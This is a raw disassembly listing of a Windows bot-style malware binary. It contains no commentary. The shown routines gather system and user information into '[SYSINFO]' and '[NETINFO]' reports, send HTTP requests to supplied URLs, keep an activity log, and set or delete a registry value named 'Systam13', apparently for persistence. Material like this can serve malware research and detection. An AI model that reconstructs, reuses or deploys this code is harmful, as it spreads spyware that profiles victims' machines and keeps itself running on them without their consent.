mov eax, edx
xor edx, edx
div ebp
xor edx, edx
push eax
mov eax, esi
div edi
xor edx, edx
mov esi, offset dword_4367FC
push eax
mov eax, ecx
div ebx
push eax
push offset aDdDhDm ; "%dd %dh %dm"
push 32h
push esi
call sub_4159FA
add esp, 18h
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_409D67 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409DD0 proc near ; CODE XREF: sub_40767D+24�p
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
push ebp
mov ebp, esp
sub esp, 94h
lea eax, [ebp+var_94]
push esi
push eax
xor esi, esi
mov [ebp+var_94], 94h
call ds:dword_422124 ; GetVersionExA
test eax, eax
jz short loc_409E63
cmp [ebp+var_90], 4
jnz short loc_409E39
cmp [ebp+var_8C], esi
jnz short loc_409E21
cmp [ebp+var_84], 1
jnz short loc_409E14
push 1
pop esi
loc_409E14: ; CODE XREF: sub_409DD0+3F�j
cmp [ebp+var_84], 2
jnz short loc_409E63
push 1
jmp short loc_409E62
; ---------------------------------------------------------------------------
loc_409E21: ; CODE XREF: sub_409DD0+36�j
cmp [ebp+var_8C], 0Ah
jnz short loc_409E2E
loc_409E2A: ; CODE XREF: sub_409DD0+78�j
push 2
jmp short loc_409E62
; ---------------------------------------------------------------------------
loc_409E2E: ; CODE XREF: sub_409DD0+58�j
cmp [ebp+var_8C], 5Ah
jnz short loc_409E63
jmp short loc_409E53
; ---------------------------------------------------------------------------
loc_409E39: ; CODE XREF: sub_409DD0+2E�j
cmp [ebp+var_90], 5
jnz short loc_409E63
cmp [ebp+var_8C], esi
jz short loc_409E2A
cmp [ebp+var_8C], 1
jnz short loc_409E57
loc_409E53: ; CODE XREF: sub_409DD0+67�j
push 3
jmp short loc_409E62
; ---------------------------------------------------------------------------
loc_409E57: ; CODE XREF: sub_409DD0+81�j
cmp [ebp+var_8C], 2
jnz short loc_409E63
push 7
loc_409E62: ; CODE XREF: sub_409DD0+4F�j
; sub_409DD0+5C�j ...
pop esi
loc_409E63: ; CODE XREF: sub_409DD0+25�j
; sub_409DD0+4B�j ...
mov eax, esi
pop esi
leave
retn
sub_409DD0 endp
; =============== S U B R O U T I N E =======================================
sub_409E68 proc near ; CODE XREF: sub_409F1E+290�p
push ebx
push esi
push edi
mov esi, 0F4240h
loc_409E70: ; CODE XREF: sub_409E68+2F�j
; sub_409E68+35�j
rdtsc
push 3E8h
mov edi, edx
mov ebx, eax
call ds:dword_422054 ; Sleep
rdtsc
sub eax, ebx
push 0
sbb edx, edi
push esi
push edx
push eax
call sub_417370
mov edi, edx
mov ebx, eax
test edi, edi
ja short loc_409E70
jb short loc_409E9F
cmp ebx, esi
ja short loc_409E70
loc_409E9F: ; CODE XREF: sub_409E68+31�j
push 0
push 64h
push edi
push ebx
call sub_4172F0
mov ecx, edx
push 64h
xor edx, edx
mov esi, eax
test ecx, ecx
pop eax
ja short loc_409F12
jb short loc_409EBE
cmp esi, 50h
jnb short loc_409EC3
loc_409EBE: ; CODE XREF: sub_409E68+4F�j
push 4Bh
xor edx, edx
pop eax
loc_409EC3: ; CODE XREF: sub_409E68+54�j
test ecx, ecx
ja short loc_409F12
jb short loc_409ECE
cmp esi, 47h
jnb short loc_409ED3
loc_409ECE: ; CODE XREF: sub_409E68+5F�j
push 42h
xor edx, edx
pop eax
loc_409ED3: ; CODE XREF: sub_409E68+64�j
test ecx, ecx
ja short loc_409F12
jb short loc_409EDE
cmp esi, 37h
jnb short loc_409EE3
loc_409EDE: ; CODE XREF: sub_409E68+6F�j
push 32h
xor edx, edx
pop eax
loc_409EE3: ; CODE XREF: sub_409E68+74�j
test ecx, ecx
ja short loc_409F12
jb short loc_409EEE
cmp esi, 26h
jnb short loc_409EF3
loc_409EEE: ; CODE XREF: sub_409E68+7F�j
push 21h
xor edx, edx
pop eax
loc_409EF3: ; CODE XREF: sub_409E68+84�j
test ecx, ecx
ja short loc_409F12
jb short loc_409EFE
cmp esi, 1Eh
jnb short loc_409F03
loc_409EFE: ; CODE XREF: sub_409E68+8F�j
push 19h
xor edx, edx
pop eax
loc_409F03: ; CODE XREF: sub_409E68+94�j
test ecx, ecx
ja short loc_409F12
jb short loc_409F0E
cmp esi, 0Ah
jnb short loc_409F12
loc_409F0E: ; CODE XREF: sub_409E68+9F�j
xor eax, eax
xor edx, edx
loc_409F12: ; CODE XREF: sub_409E68+4D�j
; sub_409E68+5D�j ...
sub eax, esi
sbb edx, ecx
add eax, ebx
adc edx, edi
pop edi
pop esi
pop ebx
retn
sub_409E68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409F1E proc near ; CODE XREF: sub_40D2E0+59EE�p
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
var_4E8 = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
var_2E8 = byte ptr -2E8h
var_25C = word ptr -25Ch
var_25A = byte ptr -25Ah
var_15C = byte ptr -15Ch
var_114 = byte ptr -114h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_38 = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7E8h
push ebx
push esi
lea eax, [ebp+var_CC]
push edi
push eax
mov [ebp+var_4], offset byte_4325D8
mov [ebp+var_CC], 94h
call ds:dword_422124 ; GetVersionExA
xor ebx, ebx
cmp [ebp+var_C8], 4
jnz short loc_409FA5
cmp [ebp+var_C4], ebx
jnz short loc_409F81
cmp [ebp+var_BC], 1
jnz short loc_409F6B
mov [ebp+var_4], offset a95 ; "95"
loc_409F6B: ; CODE XREF: sub_409F1E+44�j
cmp [ebp+var_BC], 2
jnz loc_40A020
mov [ebp+var_4], offset aNt ; "NT"
jmp short loc_409FF1
; ---------------------------------------------------------------------------
loc_409F81: ; CODE XREF: sub_409F1E+3B�j
cmp [ebp+var_C4], 0Ah
jnz short loc_409F93
mov [ebp+var_4], offset a98 ; "98"
jmp short loc_409FE8
; ---------------------------------------------------------------------------
loc_409F93: ; CODE XREF: sub_409F1E+6A�j
cmp [ebp+var_C4], 5Ah
jnz short loc_409FE1
mov [ebp+var_4], offset aMe ; "ME"
jmp short loc_409FE8
; ---------------------------------------------------------------------------
loc_409FA5: ; CODE XREF: sub_409F1E+33�j
cmp [ebp+var_C8], 5
jnz short loc_409FE1
cmp [ebp+var_C4], ebx
jnz short loc_409FBF
mov [ebp+var_4], offset a2k ; "2K"
jmp short loc_409FE8
; ---------------------------------------------------------------------------
loc_409FBF: ; CODE XREF: sub_409F1E+96�j
cmp [ebp+var_C4], 1
jnz short loc_409FD1
mov [ebp+var_4], offset aXp ; "XP"
jmp short loc_409FE8
; ---------------------------------------------------------------------------
loc_409FD1: ; CODE XREF: sub_409F1E+A8�j
cmp [ebp+var_C4], 2
mov [ebp+var_4], offset a2003 ; "2003"
jz short loc_409FE8
loc_409FE1: ; CODE XREF: sub_409F1E+7C�j
; sub_409F1E+8E�j
mov [ebp+var_4], offset dword_4294F4
loc_409FE8: ; CODE XREF: sub_409F1E+73�j
; sub_409F1E+85�j ...
cmp [ebp+var_BC], 2
jnz short loc_40A020
loc_409FF1: ; CODE XREF: sub_409F1E+61�j
cmp [ebp+var_B8], bl
jz short loc_40A020
lea eax, [ebp+var_B8]
push eax
lea eax, [ebp+var_2E8]
push [ebp+var_4]
push offset dword_4294EC
push eax
call sub_415480
lea eax, [ebp+var_2E8]
add esp, 10h
mov [ebp+var_4], eax
loc_40A020: ; CODE XREF: sub_409F1E+54�j
; sub_409F1E+D1�j ...
mov ax, ds:word_4294E8
push 3Fh
mov [ebp+var_25C], ax
pop ecx
xor eax, eax
lea edi, [ebp+var_25A]
rep stosd
stosw
mov eax, ds:dword_436354
mov [ebp+var_C], 100h
cmp eax, ebx
jz short loc_40A059
lea ecx, [ebp+var_C]
push ecx
lea ecx, [ebp+var_25C]
push ecx
call eax ; GetUserNameA
loc_40A059: ; CODE XREF: sub_409F1E+12C�j
push [ebp+arg_4]
call sub_409526
pop ecx
push eax
call ds:dword_4364A8 ; inet_addr
mov [ebp+var_8], eax
push 2
lea eax, [ebp+var_8]
push 4
push eax
call ds:dword_436420 ; gethostbyaddr
cmp eax, ebx
jz short loc_40A082
push dword ptr [eax]
jmp short loc_40A087
; ---------------------------------------------------------------------------
loc_40A082: ; CODE XREF: sub_409F1E+15E�j
push offset aCouldnTResolve ; "couldn't resolve host"
loc_40A087: ; CODE XREF: sub_409F1E+162�j
lea eax, [ebp+var_3E4]
push eax
call sub_415480
pop ecx
lea eax, [ebp+var_4E8]
pop ecx
push 104h
push eax
call ds:dword_422058 ; GetSystemDirectoryA
lea eax, [ebp+var_114]
push 46h
push eax
push offset aDdMmmYyyy ; "dd:MMM:yyyy"
push ebx
mov esi, 409h
push ebx
push esi
call ds:dword_422068 ; GetDateFormatA
lea eax, [ebp+var_15C]
push 46h
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call ds:dword_422064 ; GetTimeFormatA
push 20h
lea eax, [ebp+var_38]
push ebx
push eax
call sub_415500
add esp, 0Ch
lea eax, [ebp+var_38]
push eax
call ds:dword_422128 ; GlobalMemoryStatus
push ebx
push ebx
lea eax, [ebp+var_18]
push ebx
push eax
lea eax, [ebp+var_4E8]
push eax
call sub_4173D8
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_7E8]
push eax
call sub_40B73E
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_7E8]
rep movsd
push 60h
lea esi, [ebp+var_7E8]
pop ecx
lea edi, [ebp+var_668]
rep movsd
push ebx
call sub_409D67
add esp, 20h
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_25C]
push eax
push [ebp+arg_4]
call sub_409526
pop ecx
push eax
lea eax, [ebp+var_3E4]
push eax
lea eax, [ebp+var_4E8]
push eax
lea eax, [ebp+var_5E8]
push [ebp+var_C0]
push [ebp+var_C4]
push [ebp+var_C8]
push [ebp+var_4]
push eax
lea eax, [ebp+var_568]
push eax
mov eax, [ebp+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_40B62E
pop ecx
pop ecx
push eax
mov eax, [ebp+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_40B62E
pop ecx
pop ecx
push eax
call sub_409E68
push edx
push eax
push offset aSysinfoCpuI64u ; "[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"...
push 200h
push [ebp+arg_0]
call sub_4159FA
mov eax, [ebp+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
leave
retn
sub_409F1E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A1D2 proc near ; CODE XREF: sub_40D2E0+4555�p
; sub_40D2E0+5A1F�p
var_8C = byte ptr -8Ch
var_C = byte ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8Ch
push esi
mov esi, 80h
push esi
lea eax, [ebp+var_8C]
push 0
push eax
call sub_415500
add esp, 0Ch
cmp ds:dword_436550, 0
jnz short loc_40A23E
push 0
lea eax, [ebp+var_8C]
push esi
push eax
lea eax, [ebp+var_C]
push eax
call ds:dword_436338 ; InternetGetConnectedStateEx
test eax, eax
jnz short loc_40A227
lea eax, [ebp+var_8C]
push offset dword_429568
push eax
call sub_415480
pop ecx
pop ecx
loc_40A227: ; CODE XREF: sub_40A1D2+40�j
test [ebp+var_C], 1
jz short loc_40A234
push offset dword_429560
jmp short loc_40A239
; ---------------------------------------------------------------------------
loc_40A234: ; CODE XREF: sub_40A1D2+59�j
push offset off_42955C
loc_40A239: ; CODE XREF: sub_40A1D2+60�j
lea eax, [ebp+var_8]
jmp short loc_40A256
; ---------------------------------------------------------------------------
loc_40A23E: ; CODE XREF: sub_40A1D2+28�j
mov esi, offset off_429558
lea eax, [ebp+var_8]
push esi
push eax
call sub_415480
pop ecx
lea eax, [ebp+var_8C]
pop ecx
push esi
loc_40A256: ; CODE XREF: sub_40A1D2+6A�j
push eax
call sub_415480
pop ecx
pop ecx
push [ebp+arg_4]
push [ebp+arg_8]
call sub_409526
pop ecx
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_8]
push eax
push offset aNetinfoTypeSS_ ; "[NETINFO]: [Type]: %s (%s). [IP Address"...
push 200h
push [ebp+arg_0]
call sub_4159FA
mov eax, [ebp+arg_0]
add esp, 1Ch
pop esi
leave
retn
sub_40A1D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A291 proc near ; DATA XREF: sub_40D2E0+4974�o
var_65C = byte ptr -65Ch
var_55C = byte ptr -55Ch
var_35C = dword ptr -35Ch
var_358 = byte ptr -358h
var_2D8 = byte ptr -2D8h
var_258 = byte ptr -258h
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1C8 = byte ptr -1C8h
var_148 = byte ptr -148h
var_C8 = byte ptr -0C8h
var_48 = dword ptr -48h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 65Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 65h
mov esi, eax
pop ecx
lea edi, [ebp+var_35C]
rep movsd
push 1
mov edi, 80h
pop esi
xor ebx, ebx
mov [eax+190h], esi
push edi
lea eax, [ebp+var_148]
push ebx
push eax
mov [ebp+var_C], ebx
mov [ebp+var_4], ebx
mov [ebp+var_8], offset dword_429698
call sub_415500
push edi
lea eax, [ebp+var_1C8]
push ebx
push eax
call sub_415500
push edi
lea eax, [ebp+var_C8]
push ebx
push eax
call sub_415500
push 100h
lea eax, [ebp+var_65C]
push ebx
push eax
call sub_415500
push 3Ch
lea eax, [ebp+var_48]
pop edi
push edi
push ebx
push eax
call sub_415500
add esp, 3Ch
lea eax, [ebp+var_48]
mov [ebp+var_48], edi
mov [ebp+var_34], esi
push eax
lea eax, [ebp+var_358]
push ebx
push eax
mov [ebp+var_28], esi
mov [ebp+var_20], esi
mov [ebp+var_18], esi
call sub_415C80
pop ecx
push eax
lea eax, [ebp+var_358]
push eax
call ds:dword_436370 ; InternetCrackUrlA
test eax, eax
jz loc_40A42B
cmp [ebp+var_34], ebx
jbe short loc_40A368
push [ebp+var_34]
lea eax, [ebp+var_148]
push [ebp+var_38]
push eax
call sub_416D30
add esp, 0Ch
loc_40A368: ; CODE XREF: sub_40A291+C0�j
cmp [ebp+var_28], ebx
movzx esi, [ebp+var_30]
jbe short loc_40A386
push [ebp+var_28]
lea eax, [ebp+var_1C8]
push [ebp+var_2C]
push eax
call sub_416D30
add esp, 0Ch
loc_40A386: ; CODE XREF: sub_40A291+DE�j
cmp [ebp+var_20], ebx
jbe short loc_40A3A0
push [ebp+var_20]
lea eax, [ebp+var_C8]
push [ebp+var_24]
push eax
call sub_416D30
add esp, 0Ch
loc_40A3A0: ; CODE XREF: sub_40A291+F8�j
cmp [ebp+var_18], ebx
jbe short loc_40A3BA
push [ebp+var_18]
lea eax, [ebp+var_65C]
push [ebp+var_1C]
push eax
call sub_416D30
add esp, 0Ch
loc_40A3BA: ; CODE XREF: sub_40A291+112�j
push ebx
push ebx
lea eax, [ebp+var_C8]
push 3
push eax
lea eax, [ebp+var_1C8]
push eax
lea eax, [ebp+var_148]
push esi
push eax
push ds:dword_436418
call ds:dword_43643C ; InternetConnectA
mov esi, eax
cmp esi, ebx
jz short loc_40A443
push ebx
lea eax, [ebp+var_8]
push 200h
push eax
lea eax, [ebp+var_2D8]
push eax
lea eax, [ebp+var_65C]
push ebx
push eax
push ebx
push esi
call ds:dword_436430 ; HttpOpenRequestA
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_40A44A
push ebx
push ebx
push ebx
push ebx
push eax
call ds:dword_4363E4 ; HttpSendRequestA
test eax, eax
jz short loc_40A424
push offset dword_42966C
jmp short loc_40A44F
; ---------------------------------------------------------------------------
loc_40A424: ; CODE XREF: sub_40A291+18A�j
push offset unk_429620
jmp short loc_40A44F
; ---------------------------------------------------------------------------
loc_40A42B: ; CODE XREF: sub_40A291+B7�j
lea eax, [ebp+var_55C]
push offset dword_4295F4
push eax
call sub_415480
mov esi, [ebp+var_C]
pop ecx
pop ecx
jmp short loc_40A45D
; ---------------------------------------------------------------------------
loc_40A443: ; CODE XREF: sub_40A291+153�j
push offset unk_4295B8
jmp short loc_40A44F
; ---------------------------------------------------------------------------
loc_40A44A: ; CODE XREF: sub_40A291+17B�j
push offset unk_429578
loc_40A44F: ; CODE XREF: sub_40A291+191�j
; sub_40A291+198�j ...
lea eax, [ebp+var_55C]
push eax
call sub_415480
pop ecx
pop ecx
loc_40A45D: ; CODE XREF: sub_40A291+1B0�j
cmp [ebp+var_1D4], ebx
jnz short loc_40A488
push ebx
lea eax, [ebp+var_55C]
push [ebp+var_1D0]
push eax
lea eax, [ebp+var_258]
push eax
push [ebp+var_35C]
call sub_40BAE7
add esp, 14h
loc_40A488: ; CODE XREF: sub_40A291+1D2�j
lea eax, [ebp+var_55C]
push eax
call sub_40A5B3
pop ecx
push esi
call ds:dword_43649C ; InternetCloseHandle
push [ebp+var_4]
call ds:dword_43649C ; InternetCloseHandle
push [ebp+var_1D8]
call sub_415248
pop ecx
push ebx
call ds:dword_422044 ; ExitThread
pop edi
pop esi
pop ebx
sub_40A291 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A4BB proc near ; CODE XREF: sub_40D2E0+448E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
push edi
mov esi, offset dword_43B140
mov edi, 0B8h
loc_40A4CF: ; CODE XREF: sub_40A4BB+33�j
cmp byte ptr [esi], 0
jz short loc_40A4F2
push [ebp+arg_0]
push esi
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz short loc_40A4F2
inc [ebp+var_4]
add esi, edi
cmp esi, offset dword_43BCC0
jl short loc_40A4CF
jmp short loc_40A534
; ---------------------------------------------------------------------------
loc_40A4F2: ; CODE XREF: sub_40A4BB+17�j
; sub_40A4BB+26�j
mov esi, [ebp+var_4]
push ebx
imul esi, 0B8h
push edi
push 0
lea ebx, dword_43B140[esi]
push ebx
call sub_415500
push 17h
push [ebp+arg_0]
push ebx
call sub_416D30
push 9Fh
lea eax, dword_43B158[esi]
push [ebp+arg_4]
push eax
call sub_416D30
add esp, 24h
inc ds:dword_42AE8C
pop ebx
loc_40A534: ; CODE XREF: sub_40A4BB+35�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_40A4BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A53B proc near ; CODE XREF: sub_40D2E0+5B58�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset dword_4296A8
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 14h
xor edi, edi
mov esi, offset dword_43B140
loc_40A565: ; CODE XREF: sub_40A53B+72�j
cmp byte ptr [esi], 0
jz short loc_40A5A0
lea eax, [esi+18h]
push eax
push esi
push edi
push offset dword_42969C
lea eax, [ebp+var_200]
push 200h
push eax
call sub_4159FA
push 1
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 2Ch
loc_40A5A0: ; CODE XREF: sub_40A53B+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_43BCC0
jl short loc_40A565
pop edi
pop esi
leave
retn
sub_40A53B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A5B3 proc near ; CODE XREF: sub_401000+9A�p
; sub_4010B5+314�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
lea eax, [ebp+var_10]
push edi
push eax
call ds:dword_42205C ; GetLocalTime
mov ebx, offset dword_43A834
mov edi, 80h
mov esi, offset dword_436834
loc_40A5D5: ; CODE XREF: sub_40A5B3+3D�j
cmp byte ptr [ebx], 0
jz short loc_40A5EC
push 7Fh
lea eax, [ebx+80h]
push ebx
push eax
call sub_416D30
add esp, 0Ch
loc_40A5EC: ; CODE XREF: sub_40A5B3+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_40A5D5
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push edi
push esi
call sub_4159FA
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_40A5B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A627 proc near ; CODE XREF: sub_406224+15B�p
; sub_4063AC+1AF�p ...
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_80]
push [ebp+arg_0]
push 80h
push eax
call sub_41751F
lea eax, [ebp+var_80]
push eax
call sub_40A5B3
add esp, 14h
leave
retn
sub_40A627 endp
; =============== S U B R O U T I N E =======================================
sub_40A653 proc near ; CODE XREF: sub_40D2E0+5A4F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset dword_436834
xor ecx, ecx
loc_40A65A: ; CODE XREF: sub_40A653+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset dword_43A834
jl short loc_40A65A
cmp [esp+arg_C], ecx
push esi
mov esi, offset dword_4296DC
jnz short loc_40A68A
push ecx
push [esp+8+arg_8]
push esi
push [esp+10h+arg_4]
push [esp+14h+arg_0]
call sub_40BAE7
add esp, 14h
loc_40A68A: ; CODE XREF: sub_40A653+1F�j
push esi
call sub_40A5B3
pop ecx
pop esi
retn
sub_40A653 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A693 proc near ; DATA XREF: sub_40D2E0+5B02�o
var_31C = byte ptr -31Ch
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp+var_11C]
push 1
rep movsd
xor edx, edx
pop edi
cmp [ebp+var_10], edx
mov [ebp+var_8], 80h
mov [ebp+var_4], edx
mov [eax+110h], edi
jnz short loc_40A6E6
push edx
lea eax, [ebp+var_118]
push [ebp+var_14]
push offset dword_429730
push eax
push [ebp+var_11C]
call sub_40BAE7
add esp, 14h
loc_40A6E6: ; CODE XREF: sub_40A693+33�j
cmp [ebp+var_98], 0
jz short loc_40A706
lea eax, [ebp+var_98]
push eax
call sub_4159EF
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short loc_40A706
mov [ebp+var_8], eax
loc_40A706: ; CODE XREF: sub_40A693+5A�j
; sub_40A693+6E�j
and [ebp+arg_0], 0
mov esi, offset dword_436834
loc_40A70F: ; CODE XREF: sub_40A693+D4�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jge short loc_40A769
cmp byte ptr [esi], 0
jz short loc_40A758
cmp [ebp+var_98], 0
jz short loc_40A73E
cmp [ebp+var_4], 0
jnz short loc_40A73E
lea eax, [ebp+var_98]
push eax
push esi
call sub_408FB5
pop ecx
test eax, eax
pop ecx
jz short loc_40A758
loc_40A73E: ; CODE XREF: sub_40A693+90�j
; sub_40A693+96�j
push edi
lea eax, [ebp+var_118]
push [ebp+var_14]
push esi
push eax
push [ebp+var_11C]
call sub_40BAE7
add esp, 14h
loc_40A758: ; CODE XREF: sub_40A693+87�j
; sub_40A693+A9�j
inc [ebp+arg_0]
add esi, 80h
cmp esi, offset dword_43A834
jl short loc_40A70F
loc_40A769: ; CODE XREF: sub_40A693+82�j
lea eax, [ebp+var_31C]
push offset dword_429704
push eax
call sub_415480
xor esi, esi
pop ecx
cmp [ebp+var_10], esi
pop ecx
jnz short loc_40A7A3
push esi
lea eax, [ebp+var_31C]
push [ebp+var_14]
push eax
lea eax, [ebp+var_118]
push eax
push [ebp+var_11C]
call sub_40BAE7
add esp, 14h
loc_40A7A3: ; CODE XREF: sub_40A693+EE�j
lea eax, [ebp+var_31C]
push eax
call sub_40A5B3
push [ebp+var_18]
call sub_415248
pop ecx
pop ecx
push esi
call ds:dword_422044 ; ExitThread
pop edi
pop esi
sub_40A693 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A7C2 proc near ; CODE XREF: sub_409288+1E�p
; sub_40CB17+346�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, offset dword_429750
xor esi, esi
mov ebx, offset aSystam13 ; "Systam13"
loc_40A7D5: ; CODE XREF: sub_40A7C2+69�j
lea eax, [ebp+var_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push dword ptr [edi+4]
push dword ptr [edi]
call ds:dword_43641C ; RegCreateKeyExA
cmp [ebp+arg_0], esi
jz short loc_40A80F
push [ebp+arg_0]
call sub_415C80
pop ecx
push eax
push [ebp+arg_0]
push 1
push esi
push ebx
push [ebp+var_4]
call ds:dword_43648C ; RegSetValueExA
jmp short loc_40A819
; ---------------------------------------------------------------------------
loc_40A80F: ; CODE XREF: sub_40A7C2+2F�j
push ebx
push [ebp+var_4]
call ds:dword_4363D4 ; RegDeleteValueA
loc_40A819: ; CODE XREF: sub_40A7C2+4B�j
push [ebp+var_4]
call ds:dword_436444 ; RegCloseKey
add edi, 8
cmp edi, offset dword_429768
jb short loc_40A7D5
pop edi
pop esi
pop ebx
leave
retn
sub_40A7C2 endp
; =============== S U B R O U T I N E =======================================
sub_40A832 proc near ; CODE XREF: sub_40A86D+56�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov edx, [esp+arg_0]
push esi
or esi, 0FFFFFFFFh
test eax, eax
jz short loc_40A867
push ebx
push edi
lea edi, [eax]
mov ecx, 0FFh
loc_40A84B: ; CODE XREF: sub_40A832+31�j
mov al, [edx]
mov ebx, esi
and eax, ecx
and ebx, ecx
xor eax, ebx
shr esi, 8
mov eax, ds:dword_42227C[eax*4]
xor esi, eax
inc edx
dec edi
jnz short loc_40A84B
pop edi
pop ebx
loc_40A867: ; CODE XREF: sub_40A832+E�j
mov eax, esi
pop esi
not eax
retn
sub_40A832 endp
; =============== S U B R O U T I N E =======================================
sub_40A86D proc near ; CODE XREF: sub_40B105+24A�p
var_10 = dword ptr -10h
arg_0 = dword ptr 4
push ebx
push esi
xor ebx, ebx
push edi
push ebx
call sub_415D2F
mov [esp+10h+var_10], offset aRb ; "rb"
push [esp+10h+arg_0]
mov esi, eax
call sub_415B78
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz short loc_40A8BC
loc_40A892: ; CODE XREF: sub_40A86D+4D�j
test byte ptr [edi+0Ch], 10h
jnz short loc_40A8C0
inc ebx
push ebx
push esi
call sub_41756F
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_40A8BC
push edi
push 1
lea eax, [esi+ebx-1]
push 1
push eax
call sub_416BA7
add esp, 10h
jmp short loc_40A892
; ---------------------------------------------------------------------------
loc_40A8BC: ; CODE XREF: sub_40A86D+23�j
; sub_40A86D+39�j
xor eax, eax
jmp short loc_40A8DB
; ---------------------------------------------------------------------------
loc_40A8C0: ; CODE XREF: sub_40A86D+29�j
dec ebx
push ebx
push esi
call sub_40A832
push esi
mov ebx, eax
call sub_415DE1
push edi
call sub_415AD0
add esp, 10h
mov eax, ebx
loc_40A8DB: ; CODE XREF: sub_40A86D+51�j
pop edi
pop esi
pop ebx
retn
sub_40A86D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A8DF proc near ; CODE XREF: sub_40A965+33�p
; sub_40AEC8+BC�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
